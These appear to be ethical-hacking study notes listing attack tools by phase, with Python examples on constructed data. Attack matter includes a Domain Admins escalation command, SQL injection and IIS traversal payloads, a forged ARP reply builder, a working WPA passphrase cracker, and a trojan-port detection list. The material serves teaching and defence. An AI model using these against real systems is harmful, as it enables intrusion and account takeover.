TOOLS (footprinting)
- Web searches
  - Organization's website, job sites, news sites and press releases
  - Private websites: private.organizationwebsiteurl.com, members.organizationwebsiteurl.com, customers.organizationwebsiteurl.com
- ARIN WhoIs
- Traceroute (tracert in Windows): sends probes with the TTL raised by one per hop, so each router on the path gives itself away when the TTL expires. Windows tracert uses ICMP echo; Unix traceroute sends UDP by default. Example: TRACERT www.sysedco.com
- Google search
- Archive.org WayBackMachine: old copies of the site
- people.yahoo.com
- Netcraft.com: enumerates DNS hosts, reports web server and OS
- robots.txt: lists the pages the site asks search engines not to index, which points straight at directories worth a look, e.g. www.eccouncil.org/robots.txt
- Wikto
  - Spider: grabs directories based on links
  - Googler: searches for a keyword within a site
  - BackEnd: powerful; attempts to connect to all potential directories for you
  - Wikto: attempts different types of hacks
  - GoogleHacks: attempts Google hacks
- EmailTrackerPro: tracks email headers
- WebDataExtractor: extracts data from a website
- SmartWhois: extracts domain information
- VisualRoute: graphical traceroute; identifies web servers and firewalls
COUNTERMEASURES
SCANNING TOOLS
- NMAP: port scanner, network mapper, banner grabbing; finds open ports and the OS, reports how hard the TCP sequence is to predict (difficulty of hijacking), can hide your IP address among decoy addresses
  - Stealth scan (half open / SYN scan): SYN, SYN/ACK, then RST instead of completing the handshake
  - TCP Connect scan (full open, 3-way handshake)
  - Xmas scan (FIN, PSH and URG set), FIN scan (only FIN set), NULL scan (no flags set): all rely on RFC 793 behaviour, where a closed port answers RST and an open port stays silent. Windows answers RST either way, so these only work against RFC 793-compliant stacks
  - IDLE scan: probes are spoofed from an idle "zombie" host and the result is read from the zombie's IP ID counter, so the target never sees our address and we never respond to it
- Banner grabbing: Telnet, p0f, httprint, Netcraft website
- Scanning for vulnerabilities: Microsoft Baseline Security Analyzer (scans MS systems, gives a report of potential security issues), Bidiblah (Linux), SAINT, Nessus, SARA and SATAN
- Diagram the network: Visio, GFI LANguard
- War dialing
- PING
- Angry IP Scanner: scans IP ranges to identify live devices, can look for specific ports
- HTTP relay server
COUNTERMEASURES
ENUMERATION TOOLS
- Null sessions: NetBIOS enumeration (anonymous connection to IPC$)
- nslookup command: DNS enumeration
- LDAP: Active Directory enumeration
- LDIFDE: Active Directory dump
- DumpSec: opens a null session, graphical
- Hyena: old, Windows NT
- SuperScan: enumeration
- Historic tools (Windows NT era): Legion, NTInfoScan
PASSWORD CRACKING TOOLS
- L0phtCrack
- John the Ripper
- KerbCrack
- Cain and Abel
- SMBRelay
- pwdump2
COUNTERMEASURES
- Do not use default passwords anywhere
- Use strong passwords
- Enforce good password policies
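The scan types listed above differ only in which TCP flags the probe carries and in how the target's stack answers. As an added example that is not part of the original notes, this Python model encodes the RFC 793 rules, the Windows deviation that defeats FIN/NULL/Xmas scans, and the IP ID arithmetic behind the idle scan; the host types and port states are constructed for illustration.

```python
"""Model of TCP scan probes and target responses (added example, not from the notes)."""

RFC793 = "rfc793"    # BSD-derived, Linux and most Unix stacks follow RFC 793
WINDOWS = "windows"  # Windows (and e.g. Cisco IOS) send RST to inverse scans regardless of state

# Probe type -> TCP flags the scanner sets (nmap option in the comment).
PROBES = {
    "syn": {"SYN"},                   # -sS half-open / stealth scan
    "connect": {"SYN"},               # -sT full connect; the first packet is the same SYN
    "fin": {"FIN"},                   # -sF
    "null": set(),                    # -sN
    "xmas": {"FIN", "PSH", "URG"},    # -sX "all the lights on"
}


def target_response(probe, port_open, stack=RFC793):
    """Segment the target sends back: 'SYN/ACK', 'RST' or None for silence."""
    flags = PROBES[probe]
    if "SYN" in flags:
        # Open port completes step 2 of the handshake; closed port refuses with RST.
        return "SYN/ACK" if port_open else "RST"
    # Inverse scans. RFC 793: a closed port answers any non-RST segment with RST;
    # an open port drops a segment that carries neither SYN, RST nor ACK.
    if stack == WINDOWS:
        return "RST"                      # Windows: RST whether the port is open or not
    return None if port_open else "RST"


def scanner_verdict(probe, response):
    """How the scanner labels the port given the response it saw."""
    if "SYN" in PROBES[probe]:
        return {"SYN/ACK": "open", "RST": "closed"}.get(response, "filtered")
    # For inverse scans silence is ambiguous: open, or a firewall ate the probe.
    return "closed" if response == "RST" else "open|filtered"


def scan(probe, ports, stack=RFC793):
    """Run one probe type against {port: is_open} and return {port: verdict}."""
    return {port: scanner_verdict(probe, target_response(probe, is_open, stack))
            for port, is_open in ports.items()}


def idle_scan_verdict(zombie_ipid_before, zombie_ipid_after):
    """Idle scan: our own address never reaches the target.
    1. Probe the zombie (SYN/ACK); its RST carries IP ID = before.
    2. Send a SYN to the target with the zombie's address as source.
       Open port   -> target sends SYN/ACK to zombie -> zombie answers RST (+1 IP ID).
       Closed port -> target sends RST to zombie     -> zombie stays silent.
    3. Probe the zombie again; its RST (+1) carries IP ID = after.
    """
    delta = (zombie_ipid_after - zombie_ipid_before) & 0xFFFF
    if delta == 2:
        return "open"
    if delta == 1:
        return "closed|filtered"
    return "zombie not idle"        # other traffic moved the counter; pick another zombie


if __name__ == "__main__":
    ports = {22: True, 80: True, 8080: False}   # constructed target state
    for name, stack in (("unix-like", RFC793), ("windows-like", WINDOWS)):
        for probe in PROBES:
            print(f"{name:13s} {probe:8s} {scan(probe, ports, stack)}")
    print("idle scan, zombie IP ID 1000 -> 1002:", idle_scan_verdict(1000, 1002))
```

Running it shows the practical consequence: against a Windows-like stack every FIN/NULL/Xmas verdict is "closed", including the ports that are open, so those scans are worthless there while the SYN scan still works.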
PRIVILEGE ESCALATION TOOLS
- GetAdmin.exe: works on NT4 SP3 and earlier
- Hidden batch files: planted where a privileged user or service will run them, e.g. one that adds your account to Domain Admins. Command: net group "Domain Admins" user_name /add /domain
TROJAN TOOLS (default listening ports)
- Back Orifice: UDP ports 31337 or 31338
- Deep Throat: UDP ports 2140 and 3150
- NetBus: TCP ports 12345 and 12346
- Whack-a-Mole: TCP ports 12361 and 12362
- NetBus 2: TCP port 20034
- GirlFriend: TCP port 21544
- Masters Paradise: TCP ports 3129, 40421, 40422, 40423 and 40426
- Tini: TCP port 7777; very small (a few KB), serves a command prompt on that port
- Donald Dick: TCP or SPX (Novell) ports 23476 or 23477; client/server
- Netcat: opens a command-line interface over a TCP or UDP port
- Datapipe: port redirection for Unix
- Fpipe: port redirection for Windows
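Because every trojan above listens on a fixed default port, a quick host check is to compare the listening sockets against that list. As an added example that is not from the original notes, the Python below parses constructed `netstat -an` output (Windows and Linux formats) and flags listeners on those ports; a trojan reconfigured to another port, or a legitimate service that happens to use 12345, will of course defeat a port-only check, so treat a hit as a lead rather than proof.

```python
import re

# (protocol, port) -> trojan, taken from the default ports listed above.
TROJAN_PORTS = {
    ("udp", 31337): "Back Orifice", ("udp", 31338): "Back Orifice",
    ("udp", 2140): "Deep Throat", ("udp", 3150): "Deep Throat",
    ("tcp", 12345): "NetBus", ("tcp", 12346): "NetBus",
    ("tcp", 12361): "Whack-a-Mole", ("tcp", 12362): "Whack-a-Mole",
    ("tcp", 20034): "NetBus 2",
    ("tcp", 21544): "GirlFriend",
    ("tcp", 3129): "Masters Paradise", ("tcp", 40421): "Masters Paradise",
    ("tcp", 40422): "Masters Paradise", ("tcp", 40423): "Masters Paradise",
    ("tcp", 40426): "Masters Paradise",
    ("tcp", 7777): "Tini",
    ("tcp", 23476): "Donald Dick", ("tcp", 23477): "Donald Dick",
}

# One "netstat -an" line, Windows style ("TCP  0.0.0.0:12345  0.0.0.0:0  LISTENING")
# or Linux style ("tcp  0  0 0.0.0.0:12345  0.0.0.0:*  LISTEN"). Captures the
# protocol, the local port and the optional state column.
LINE_RE = re.compile(
    r"^\s*(tcp|udp)6?\s+(?:\d+\s+\d+\s+)?\S+:(\d+|\*)\s+\S+(?:\s+([A-Z_]+))?", re.I)

# Constructed sample: a NetBus and a Back Orifice listener among normal sockets.
SAMPLE_NETSTAT = """
Active Connections

  Proto  Local Address          Foreign Address        State
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING
  TCP    0.0.0.0:12345          0.0.0.0:0              LISTENING
  TCP    10.0.0.5:7777          10.0.0.9:51022         ESTABLISHED
  TCP    10.0.0.5:49152         10.0.0.1:80            TIME_WAIT
  UDP    0.0.0.0:31337          *:*
  UDP    0.0.0.0:500            *:*
"""


def parse_netstat(text):
    """Yield (proto, local_port, state) for every socket line; state is '' for UDP."""
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m or m.group(2) == "*":
            continue
        yield m.group(1).lower(), int(m.group(2)), (m.group(3) or "").upper()


def find_trojan_listeners(text):
    """Return [(proto, port, name)] for listening sockets on a known trojan port."""
    hits = []
    for proto, port, state in parse_netstat(text):
        # A TCP socket only counts if it is a listener: an outbound connection that
        # happens to use 7777 as its local port is not a Tini server.
        if proto == "tcp" and state not in ("LISTEN", "LISTENING"):
            continue
        name = TROJAN_PORTS.get((proto, port))
        if name:
            hits.append((proto, port, name))
    return hits


if __name__ == "__main__":
    for proto, port, name in find_trojan_listeners(SAMPLE_NETSTAT):
        print(f"{proto.upper()} port {port} is listening: default port of {name}")
```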
COUNTERMEASURES
- Antivirus / anti-spyware: Norton AntiVirus, McAfee, Spybot, Webroot
- User training: the most important
ARP, MAC FLOODING & DNS POISONING TOOLS
- Ettercap: ARP poisoning (spoofing) tool and sniffer
- Cain and Abel: password cracking tool with all of Ettercap's features
- Etherflood: MAC flooding (fills the switch's CAM table with bogus addresses so it floods traffic to every port like a hub)
- SMAC 2.0: modifies a Windows MAC address
- macof: Linux, like Etherflood
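The two attacks above leave different fingerprints on the wire: ARP poisoning shows up as an IP address that suddenly "moves" to a new MAC, MAC flooding as a burst of never-seen source addresses. As an added example that is not part of the original notes, the Python below builds the forged ARP reply a poisoner sends, then runs an arpwatch-style IP-to-MAC change check and a sliding-window distinct-MAC counter over constructed captures; the addresses, window size and threshold are assumptions for the example.

```python
import socket
import struct
from collections import Counter, deque

# Constructed lab addresses (not from the notes).
GATEWAY_IP, GATEWAY_MAC = "10.0.0.1", "00:11:22:33:44:01"
VICTIM_IP, VICTIM_MAC = "10.0.0.5", "00:11:22:33:44:05"
ATTACKER_MAC = "de:ad:be:ef:00:99"


def mac_bytes(mac):
    return bytes.fromhex(mac.replace(":", ""))


def mac_str(raw):
    return ":".join(f"{b:02x}" for b in raw)


def build_arp_reply(sender_mac, sender_ip, target_mac, target_ip):
    """Ethernet frame carrying an ARP reply (opcode 2). A poisoner such as Ettercap sends
    this unsolicited with sender_ip = the gateway's IP and sender_mac = its own MAC, so
    the victim's ARP cache maps the gateway to the attacker."""
    eth = mac_bytes(target_mac) + mac_bytes(sender_mac) + b"\x08\x06"  # dst, src, EtherType ARP
    arp = (struct.pack("!HHBBH", 1, 0x0800, 6, 4, 2)   # Ethernet, IPv4, hlen 6, plen 4, reply
           + mac_bytes(sender_mac) + socket.inet_aton(sender_ip)
           + mac_bytes(target_mac) + socket.inet_aton(target_ip))
    return eth + arp


def parse_arp(frame):
    """Return (opcode, sender_ip, sender_mac) for an Ethernet/ARP frame, else None."""
    if len(frame) < 42 or frame[12:14] != b"\x08\x06":
        return None
    arp = frame[14:42]
    opcode = struct.unpack("!H", arp[6:8])[0]
    return opcode, socket.inet_ntoa(arp[14:18]), mac_str(arp[8:14])


def detect_arp_poisoning(frames):
    """Remember the first MAC seen for each IP and alert when a reply claims another one."""
    table, alerts = {}, []
    for i, frame in enumerate(frames):
        parsed = parse_arp(frame)
        if parsed is None or parsed[0] != 2:      # only ARP replies are considered here
            continue
        _, ip, mac = parsed
        known = table.setdefault(ip, mac)
        if known != mac:
            alerts.append({"frame": i, "ip": ip, "old_mac": known, "new_mac": mac})
    return alerts


def detect_mac_flooding(frames, window=100, threshold=50):
    """Alert when more than `threshold` distinct source MACs occur within any `window`
    consecutive frames (macof/Etherflood behaviour). Returns the frame indexes where it held."""
    recent, counts, alerts = deque(), Counter(), []
    for i, frame in enumerate(frames):
        src = frame[6:12]
        recent.append(src)
        counts[src] += 1
        if len(recent) > window:
            old = recent.popleft()
            counts[old] -= 1
            if counts[old] == 0:
                del counts[old]
        if len(counts) > threshold:
            alerts.append(i)
    return alerts


# Constructed capture: two legitimate replies, then the attacker poisons both sides.
POISON_CAPTURE = [
    build_arp_reply(GATEWAY_MAC, GATEWAY_IP, VICTIM_MAC, VICTIM_IP),
    build_arp_reply(VICTIM_MAC, VICTIM_IP, GATEWAY_MAC, GATEWAY_IP),
    build_arp_reply(ATTACKER_MAC, GATEWAY_IP, VICTIM_MAC, VICTIM_IP),   # "10.0.0.1 is at attacker"
    build_arp_reply(ATTACKER_MAC, VICTIM_IP, GATEWAY_MAC, GATEWAY_IP),  # "10.0.0.5 is at attacker"
]


def constructed_flood_capture():
    """200 frames from five normal hosts, then 300 frames each with a fresh source MAC."""
    normal = [build_arp_reply(f"00:11:22:33:44:{n:02x}", f"10.0.0.{n}", GATEWAY_MAC, GATEWAY_IP)
              for _ in range(40) for n in range(1, 6)]
    flood = [build_arp_reply(f"02:00:00:00:{n >> 8:02x}:{n & 0xff:02x}", "10.0.0.250",
                             GATEWAY_MAC, GATEWAY_IP) for n in range(300)]
    return normal + flood


if __name__ == "__main__":
    for a in detect_arp_poisoning(POISON_CAPTURE):
        print(f"frame {a['frame']}: {a['ip']} moved from {a['old_mac']} to {a['new_mac']}")
    flood_alerts = detect_mac_flooding(constructed_flood_capture())
    print("MAC flooding first detected at frame", flood_alerts[0] if flood_alerts else None)
```

The poisoning check trusts the first mapping it sees, which is how arpwatch works too; if the attacker is already poisoning when monitoring starts, the legitimate reply is the one that raises the alert, so the alert is a prompt to compare against the switch's own tables rather than a verdict on which MAC is the real one.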
DENIAL OF SERVICE TOOLS
- Smurf: spoofed ICMP echo requests sent to a broadcast address; every host on that network replies to the victim
- SYN attack (SYN flood): half-open connections exhaust the target's connection backlog
- Jolt: sends fragmented ICMP that cannot be reassembled
HIJACKING TOOLS
- Juggernaut: Linux, hijacks sessions based on keywords
- Hunt: Linux, ARP spoofing, MAC discovery
- T-Sight: Windows
WEB SERVER TOOLS
- IIS Unicode attack (folder traversal attack): IIS 5 and earlier. An overlong UTF-8 encoding of "/" such as %c0%af slipped past the check for ".." because the server checked the path before decoding it
- Metasploit: multiple exploits in one framework; Unix
- Whisker: automated web application vulnerability scanner, command line
- N-Stealth HTTP: like Whisker but graphical
- WebInspect: graphical, over 1500 scans
- Shadow Security Scanner: NetBIOS, HTTP, CGI, WinCGI, FTP, DNS, etc.
- SecureIIS: specifically scans IIS
- Google Hacking Database (johnny.ihackstuff.com), e.g. inurl:custva.asp site:yoursite.com
- Wikto / Google Hacks
- Black Widow: web ripping tool (downloads a whole site for offline study)
COUNTERMEASURES
Web server
- Patch management: WSUS (Windows Server Update Services)
- Properly configure web servers; don't leave default settings
- Set policies and maintain them
- IIS Lockdown Tool and URLScan
- MBSA (Microsoft Baseline Security Analyzer)
- Run web server services with least-privilege accounts
- Use a firewall; put the web server in a DMZ
- Rename admin accounts and use strong passwords
- Disable default websites
- Disable directory browsing
- Include legal notices
- Disable web/remote administration of the web server
Web apps
- Use encryption
- Parse (validate) forms and inputs
- Don't store passwords in the clear
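The IIS Unicode traversal above is worth seeing as an ordering bug: the server validated the raw request and canonicalised it afterwards. As an added example that is not part of the original notes, the Python below models the broken order beside the correct one. The web root, the tolerant decoder and the request paths are assumptions for the example; Python's own UTF-8 codec rejects the overlong %c0%af form, which is exactly the property the hardened version relies on.

```python
import posixpath
from urllib.parse import unquote_to_bytes

WEBROOT = "/inetpub/wwwroot"   # assumed document root for the example


def lenient_utf8_decode(data):
    """UTF-8 decoder that accepts overlong two-byte forms (C0 AF -> '/'), which is what
    let the IIS attack through. Only ASCII and two-byte sequences are handled here."""
    out, i = [], 0
    while i < len(data):
        b = data[i]
        if b < 0x80:
            out.append(chr(b))
            i += 1
        elif 0xC0 <= b <= 0xDF and i + 1 < len(data) and 0x80 <= data[i + 1] <= 0xBF:
            out.append(chr(((b & 0x1F) << 6) | (data[i + 1] & 0x3F)))
            i += 2
        else:
            raise ValueError(f"unsupported byte {b:#x} at offset {i}")
    return "".join(out)


def vulnerable_resolve(url_path):
    """Broken order: percent-decode, check for '..' segments, THEN the lenient UTF-8
    decode. '..%c0%af' contains no '/' when checked and becomes '../' afterwards."""
    raw = unquote_to_bytes(url_path)
    if b".." in raw.split(b"/"):
        raise PermissionError("traversal rejected")
    decoded = lenient_utf8_decode(raw)
    return posixpath.normpath(WEBROOT + decoded)


def hardened_resolve(url_path):
    """Decode strictly (overlong forms raise), canonicalise, then check that the final
    path is still under the web root. Validation runs on the path that will be used."""
    decoded = unquote_to_bytes(url_path).decode("utf-8")
    full = posixpath.normpath(posixpath.join(WEBROOT, decoded.lstrip("/")))
    if full != WEBROOT and not full.startswith(WEBROOT + "/"):
        raise PermissionError("traversal rejected")
    return full


def outcome(resolver, url_path):
    """Resolved filesystem path, or 'REJECTED (<error>)' when the request is refused."""
    try:
        return resolver(url_path)
    except (PermissionError, ValueError) as e:     # UnicodeDecodeError is a ValueError
        return f"REJECTED ({type(e).__name__})"


if __name__ == "__main__":
    requests = [
        "/scripts/test.asp",
        "/../../winnt/system32/cmd.exe",            # plain traversal: both reject
        "/..%2f..%2fwinnt/system32/cmd.exe",        # %2f is decoded before the check: both reject
        "/..%c0%af..%c0%afwinnt/system32/cmd.exe",  # overlong '/': vulnerable server escapes the root
    ]
    for r in requests:
        print(f"{r:44s} vulnerable: {outcome(vulnerable_resolve, r):34s} hardened: {outcome(hardened_resolve, r)}")
```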
SQL TOOLS
- SQL injection attacks
- WebGoat: open-source, deliberately vulnerable application on a Tomcat web server, used to learn web server and web application attacks
- WebScarab project: local intercepting proxy
- SQL2.EXE: buffer overflow against the SQL Server Resolution Service on UDP port 1434 (the hole later used by the Slammer worm)
WIRELESS TOOLS
- WEPCrack
- AirCrack: captures WEP packets off the air and cracks the key
- WEPLab
- coWPAtty: dictionary attack on WPA pre-shared keys from a captured handshake
- Denial of service attacks
- ASLEAP: attack on Cisco LEAP (an EAP method)
- EAP-MD5: only for testing
- WIPS (wireless intrusion prevention system)
- Protocol analyzers
COUNTERMEASURES (SQL injection)
- Use input validation
- Set appropriate permissions
- Do not run the database with a powerful account
- Limit form submission attempts
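The SQL injection entry and its countermeasures above are easiest to understand side by side. As an added example that is not part of the original notes, the Python below runs a string-built login query and a parameterised one against a constructed in-memory SQLite table; the user names, passwords and the allow-list pattern are assumptions for the example. Passwords are stored hashed, as the web-app countermeasures recommend, which is also why the classic `' OR '1'='1` payload fails here and the comment-out form `admin' --` is the one that works.

```python
import hashlib
import re
import sqlite3

USERNAME_RE = re.compile(r"^[A-Za-z0-9_.-]{1,32}$")   # allow-list for the username field


def pw_hash(password):
    """Store a hash, never the password (a real system uses a salted, slow KDF)."""
    return hashlib.sha256(password.encode()).hexdigest()


def make_db():
    """Constructed in-memory user table for the example."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT PRIMARY KEY, pw_hash TEXT NOT NULL)")
    conn.executemany("INSERT INTO users VALUES (?, ?)",
                     [("admin", pw_hash("S3cret!")), ("alice", pw_hash("wonderland"))])
    return conn


def login_vulnerable(conn, username, password):
    """Query built by string concatenation: the user's input becomes SQL syntax.
    Username "admin' --" closes the quote and comments out the password clause."""
    sql = (f"SELECT username FROM users WHERE username = '{username}' "
           f"AND pw_hash = '{pw_hash(password)}'")
    row = conn.execute(sql).fetchone()
    return row[0] if row else None


def login_safe(conn, username, password):
    """Same query, parameterised: the driver passes the values separately from the SQL
    text, so quotes and comment markers in the input are only characters."""
    if not USERNAME_RE.match(username):           # input validation on top of parameters
        return None
    sql = "SELECT username FROM users WHERE username = ? AND pw_hash = ?"
    row = conn.execute(sql, (username, pw_hash(password))).fetchone()
    return row[0] if row else None


if __name__ == "__main__":
    db = make_db()
    for user, pw in [("admin", "S3cret!"), ("admin' --", "anything"),
                     ("x' OR '1'='1' --", "anything"), ("' OR '1'='1", "anything")]:
        print(f"{user!r:22s} vulnerable={login_vulnerable(db, user, pw)!r:8s} "
              f"safe={login_safe(db, user, pw)!r}")
```

Running the database as a least-privilege account, the third countermeasure above, does not stop the bypass itself but bounds what an injected statement can reach beyond the users table.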
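coWPAtty, listed under the wireless tools above, does not break WPA's cryptography; it guesses the pre-shared key offline against a captured 4-way handshake. As an added example that is not part of the original notes, the Python below carries out the same derivation with the standard library: PMK from the passphrase and SSID, PTK from the PMK and the handshake nonces, then the EAPOL MIC that either matches the capture or does not. The SSID, MAC addresses, nonces, EAPOL body and word list are constructed, and the "captured" MIC is computed from the known passphrase so the example runs offline.

```python
import hashlib
import hmac


def wpa_pmk(passphrase, ssid):
    """WPA/WPA2-Personal: PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 32 bytes).
    The 4096 iterations per candidate are what makes the attack slow, and the SSID salt
    is why coWPAtty's precomputed tables are tied to one network name."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def wpa_ptk(pmk, ap_mac, sta_mac, anonce, snonce):
    """PRF-512 from IEEE 802.11i: expand the PMK with both MACs and both nonces."""
    data = (min(ap_mac, sta_mac) + max(ap_mac, sta_mac)
            + min(anonce, snonce) + max(anonce, snonce))
    out = b"".join(hmac.new(pmk, b"Pairwise key expansion\x00" + data + bytes([i]),
                            hashlib.sha1).digest() for i in range(4))
    return out[:64]


def eapol_mic(ptk, eapol_frame):
    """WPA2 message MIC: HMAC-SHA1 under the KCK (first 16 bytes of the PTK), truncated
    to 16 bytes. eapol_frame is handshake message 2 with its MIC field zeroed."""
    return hmac.new(ptk[:16], eapol_frame, hashlib.sha1).digest()[:16]


def crack_psk(capture, wordlist):
    """Offline dictionary attack: derive PMK -> PTK -> MIC for each candidate and compare
    with the captured MIC. Returns the passphrase or None."""
    for candidate in wordlist:
        pmk = wpa_pmk(candidate, capture["ssid"])
        ptk = wpa_ptk(pmk, capture["ap_mac"], capture["sta_mac"],
                      capture["anonce"], capture["snonce"])
        if hmac.compare_digest(eapol_mic(ptk, capture["eapol_msg2"]), capture["mic"]):
            return candidate
    return None


def constructed_capture(passphrase="sunflower2007", ssid="HomeNet"):
    """Stand-in for a sniffed 4-way handshake. Nonces and EAPOL body are arbitrary bytes;
    the MIC is computed from the known passphrase so the example is self-contained."""
    cap = {
        "ssid": ssid,
        "ap_mac": bytes.fromhex("001122334455"),
        "sta_mac": bytes.fromhex("66778899aabb"),
        "anonce": bytes(range(32)),
        "snonce": bytes(range(100, 132)),
        "eapol_msg2": b"\x01\x03\x00\x75\x02\x01\x0a\x00" + b"\x00" * 113,
    }
    ptk = wpa_ptk(wpa_pmk(passphrase, ssid), cap["ap_mac"], cap["sta_mac"],
                  cap["anonce"], cap["snonce"])
    cap["mic"] = eapol_mic(ptk, cap["eapol_msg2"])
    return cap


WORDLIST = ["password", "letmein123", "sunflower2007", "trustno1!"]   # constructed

if __name__ == "__main__":
    print("recovered PSK:", crack_psk(constructed_capture(), WORDLIST))
```

Every candidate costs 4096 HMAC-SHA1 rounds, so the defence is the same as against any dictionary attack: a long passphrase that is not in a word list.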
IDS TOOLS
- Snort
- BlackICE Defender
- Cisco Secure IDS
- Dragon Sensor
- eTrust Internet Defense
- Check Point
- RealSecure